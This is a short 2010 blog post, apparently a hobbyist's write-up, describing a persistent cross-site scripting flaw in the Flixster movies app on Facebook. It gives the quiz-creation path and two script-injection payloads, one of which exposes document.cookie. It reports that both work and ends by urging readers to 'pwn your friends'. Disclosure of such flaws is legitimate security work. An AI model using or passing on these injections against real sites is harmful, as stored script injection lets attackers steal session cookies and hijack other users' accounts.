Tuesday, July 20, 2010

Facebook movies by Flixster Persistent XSS Exploit

About :
Rate movies and share what you saw or want to see with friends. Compare your movie taste. Take over 100,000 movie trivia quizzes.
Join over 40 Million people using Flixster on Facebook.
This application may contain content that is unsuitable for the general Facebook user3,446,811 monthly active users

Lil more analysis of this app gave me a path for persistent xss which everyone loves the most :P
Step 1 : http://apps.facebook.com/flixster/quiz/create :D
Do the basic steps and select create quiz from the scratch..

i tired the 2 parameters
">< script>alert("W00t")< /script>
and
">< script> alert( document.cookie)< /script>

which very well works :D
Hope you can pwn your friends now ;)
Few screen shots



No comments:

Post a Comment